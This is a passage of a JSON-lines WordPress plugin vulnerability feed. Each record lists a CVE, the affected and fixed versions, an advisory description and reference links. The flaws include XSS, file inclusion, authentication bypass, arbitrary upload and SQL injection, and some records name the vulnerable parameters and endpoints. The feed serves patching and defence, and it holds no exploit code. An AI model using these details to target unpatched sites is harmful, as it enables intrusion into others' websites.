version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222176\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222176\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d25e292-b62b-493e-976c-a5eb95505065?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d25e292-b62b-493e-976c-a5eb95505065?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7894","slug":"if-menu","versionImpact":"0.19.1","versionEndExcluding":"0.19.2","description":"The If Menu plugin for WordPress is vulnerable to unauthorized modification of the plugin's license key due to a missing capability check on the 'actions' function in versions up to, and including, 0.19.1. This makes it possible for unauthenticated attackers to delete or modify the license key.","recommendation":"Update to version 0.19.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/if-menu\\\/trunk\\\/src\\\/Admin.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/if-menu\\\/trunk\\\/src\\\/Admin.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203054%40if-menu&new=3203054%40if-menu&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203054%40if-menu&new=3203054%40if-menu&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff6ebf45-4617-44dd-94d8-28aa8bc1609b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff6ebf45-4617-44dd-94d8-28aa8bc1609b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11371","slug":"theatre","versionImpact":"0.18.6.2","versionEndExcluding":"0.18.7","description":"The Theater for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.18.6.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 0.18.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theatre\\\/trunk\\\/functions\\\/wpt_productions_list_table.php#L332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theatre\\\/trunk\\\/functions\\\/wpt_productions_list_table.php#L332\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193083%40theatre&new=3193083%40theatre&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193083%40theatre&new=3193083%40theatre&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65bf0897-4d90-41e7-89a3-69845ea54ce5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65bf0897-4d90-41e7-89a3-69845ea54ce5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8767","slug":"football-leagues-by-anwppro","versionImpact":"0.16.17","versionEndExcluding":"0.16.18","description":"The AnWP Football Leagues plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 0.16.17 via the 'download_csv_players' and 'download_csv_games' functions. This makes it possible for authenticated attackers, with Administrator-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.","recommendation":"Update to version 0.16.18, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342787\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php\",\"name\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342787\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L265\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L265\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04676263-cdad-40cd-bb54-61beb727e09d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04676263-cdad-40cd-bb54-61beb727e09d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4635","slug":"menu-icons","versionImpact":"0.13.13","versionEndExcluding":"0.13.14","description":"The Menu Icons by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018add_mime_type\u2019 function in versions up to, and including, 0.13.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.13.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90284576-6570-4e4c-8eb3-743bc402ea1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90284576-6570-4e4c-8eb3-743bc402ea1b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/menu-icons\\\/tags\\\/0.13.13\\\/vendor\\\/codeinwp\\\/icon-picker\\\/includes\\\/types\\\/svg.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/menu-icons\\\/tags\\\/0.13.13\\\/vendor\\\/codeinwp\\\/icon-picker\\\/includes\\\/types\\\/svg.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086753\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086753\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12623","slug":"dicom-support","versionImpact":"0.10.6","versionEndExcluding":"0.10.7","description":"The DICOM Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dcm' shortcode in all versions up to, and including, 0.10.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.10.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dicom-support\\\/trunk\\\/DicomSupport.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dicom-support\\\/trunk\\\/DicomSupport.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257320%40dicom-support&new=3257320%40dicom-support&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257320%40dicom-support&new=3257320%40dicom-support&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d76052f8-34b3-4930-a5bf-182420b07968?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d76052f8-34b3-4930-a5bf-182420b07968?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2795","slug":"codecolorer","versionEndExcluding":"0.10.1","description":"The CodeColorer WordPress plugin before 0.10.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d6ecd21-3dd4-423d-80e7-277c45080a9f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d6ecd21-3dd4-423d-80e7-277c45080a9f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11785","slug":"integrate-firebase","versionImpact":"0.9.3","versionEndExcluding":"0.10.0","description":"The Integrate Firebase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'firebase_show' shortcode in all versions up to, and including, 0.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202693%40integrate-firebase&new=3202693%40integrate-firebase&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202693%40integrate-firebase&new=3202693%40integrate-firebase&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9788e450-4e79-43ce-ae78-466eef458c29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9788e450-4e79-43ce-ae78-466eef458c29?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12103","slug":"content-no-cache","versionImpact":"0.1.2","versionEndExcluding":"0.1.3","description":"The Content No Cache: prevent specific content from being cached plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 0.1.2 via the eos_dyn_get_content action due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 0.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211815\\\/content-no-cache\\\/trunk\\\/inc\\\/eos-dyn-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211815\\\/content-no-cache\\\/trunk\\\/inc\\\/eos-dyn-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c6fd67-2140-4835-98d0-cfd1af95ac4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c6fd67-2140-4835-98d0-cfd1af95ac4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8189","slug":"wp-multitasking","versionImpact":"0.1.17","versionEndExcluding":"0.1.18","description":"The WP MultiTasking \u2013 WP Utilities plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wpmt_menu_name\u2019 parameter in all versions up to, and including, 0.1.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 0.1.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c976e5a-2f6c-4632-99a7-a512b3dd38e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c976e5a-2f6c-4632-99a7-a512b3dd38e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-multitasking\\\/trunk\\\/wp-multitasking.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-multitasking\\\/trunk\\\/wp-multitasking.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-multitasking\\\/trunk\\\/wp-multitasking.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-multitasking\\\/trunk\\\/wp-multitasking.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158305\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158305\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12453","slug":"uptodown-apk-download-widget","versionImpact":"0.1.10","versionEndExcluding":"0.1.11","description":"The Uptodown APK Download Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'utd-widget' shortcode in all versions up to, and including, 0.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uptodown-apk-download-widget\\\/trunk\\\/uptodown_wp_widget.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uptodown-apk-download-widget\\\/trunk\\\/uptodown_wp_widget.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uptodown-apk-download-widget\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uptodown-apk-download-widget\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c2d5fc-240a-4fed-92ae-b9f84de3e119?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c2d5fc-240a-4fed-92ae-b9f84de3e119?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2636","slug":"instawp-connect","versionImpact":"0.1.0.85","versionEndExcluding":"0.1.0.86","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 0.1.0.86, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/includes\\\/database-manager\\\/loader.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/includes\\\/database-manager\\\/loader.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3269681\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3269681\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8f2c6f-c231-477c-895b-df892569ef95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8f2c6f-c231-477c-895b-df892569ef95?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13913","slug":"instawp-connect","versionImpact":"0.1.0.83","versionEndExcluding":"0.1.0.84","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.0.83. This is due to missing or incorrect nonce validation in the '\/migrate\/templates\/main.php' file. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 0.1.0.84, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/admin\\\/class-instawp-admin.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/admin\\\/class-instawp-admin.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/migrate\\\/templates\\\/main.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/migrate\\\/templates\\\/main.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254817\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254817\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea6c7b63-00da-4476-a024-97fe99af643d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea6c7b63-00da-4476-a024-97fe99af643d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6397","slug":"instawp-connect","versionImpact":"0.1.0.44","versionEndExcluding":"0.1.0.45","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1.0.44. This is due to insufficient verification of the API key. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username, and to perform a variety of other administrative tasks. NOTE: This vulnerability was partially fixed in 0.1.0.44, but was still exploitable via Cross-Site Request Forgery.","recommendation":"Update to version 0.1.0.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963f2485-3afa-4e17-8278-b75415af3915?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963f2485-3afa-4e17-8278-b75415af3915?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/class-instawp-hooks.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/class-instawp-hooks.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/class-instawp-hooks.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/class-instawp-hooks.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/apis\\\/class-instawp-rest-api.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/apis\\\/class-instawp-rest-api.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109305\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109305\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3114674\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3114674\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4898","slug":"instawp-connect","versionImpact":"0.1.0.38","versionEndExcluding":"0.1.0.39","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts.","recommendation":"Update to version 0.1.0.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92a00fb4-7b50-43fd-ac04-5d6e29336e9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92a00fb4-7b50-43fd-ac04-5d6e29336e9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.38\\\/includes\\\/class-instawp-rest-api.php#L926\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.38\\\/includes\\\/class-instawp-rest-api.php#L926\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2667","slug":"instawp-connect","versionImpact":"0.1.0.22","versionEndExcluding":"0.1.0.23","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to  insufficient file validation in the \/wp-json\/instawp-connect\/v1\/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.","recommendation":"Update to version 0.1.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6aead8d-c136-4952-ad03-86fe0f144dea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6aead8d-c136-4952-ad03-86fe0f144dea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12881","slug":"plugversions","versionImpact":"0.0.7","versionEndExcluding":"0.0.8","description":"The PlugVersions \u2013 Easily rollback to previous versions of your plugins plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the eos_plugin_reviews_restore_version() function in all versions up to, and including, 0.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary files leveraging files included locally.","recommendation":"Update to version 0.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211805%40plugversions&new=3211805%40plugversions&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211805%40plugversions&new=3211805%40plugversions&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb06c43c-bf8c-412b-8b1d-fee004d728d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb06c43c-bf8c-412b-8b1d-fee004d728d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-24003","slug":"wp-popups-lite","versionEndExcluding":" 2.1.4.9","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Timersys WP Popups \u2013 WordPress Popup plugin <= 2.1.4.8 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-popups-lite\\\/wordpress-wp-popups-wordpress-popup-builder-plugin-2-1-4-8-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-popups-lite\\\/wordpress-wp-popups-wordpress-popup-builder-plugin-2-1-4-8-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30750","slug":"cm-pop-up-banners","versionEndExcluding":" 1.6.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress.This issue affects CM Popup Plugin for WordPress: from n\/a through 1.5.10.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/cm-pop-up-banners\\\/wordpress-cm-pop-up-banners-for-wordpress-plugin-1-5-10-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/cm-pop-up-banners\\\/wordpress-cm-pop-up-banners-for-wordpress-plugin-1-5-10-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4788","slug":"dirtysuds-embed-pdf","versionImpact":"1.0.6","description":"The Embed PDF WordPress plugin through 1.0.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a162365-5a86-423d-b7c4-55c9b4d8b024\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a162365-5a86-423d-b7c4-55c9b4d8b024\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0420","slug":"custom-post-type-cpt-cusom-taxonomy-ct-manager","versionImpact":"1.1","description":"The Custom Post Type and Taxonomy GUI Manager WordPress plugin through 1.1 does not have CSRF, and is lacking sanitising as well as escaping in some parameters, allowing attackers to make a logged in admin put Stored Cross-Site Scripting payloads via CSRF","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/266e417f-ece7-4ff5-a724-4d9c8e2f3faa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/266e417f-ece7-4ff5-a724-4d9c8e2f3faa\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36741","slug":"dc-woocommerce-multi-vendor","versionImpact":"3.5.7","description":"The MultiVendorX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.7. This is due to missing or incorrect nonce validation on the submit_comment() function. This makes it possible for unauthenticated attackers to submit comments via a forged request granted they can trick a site administrator into performing an action such as clicking on a 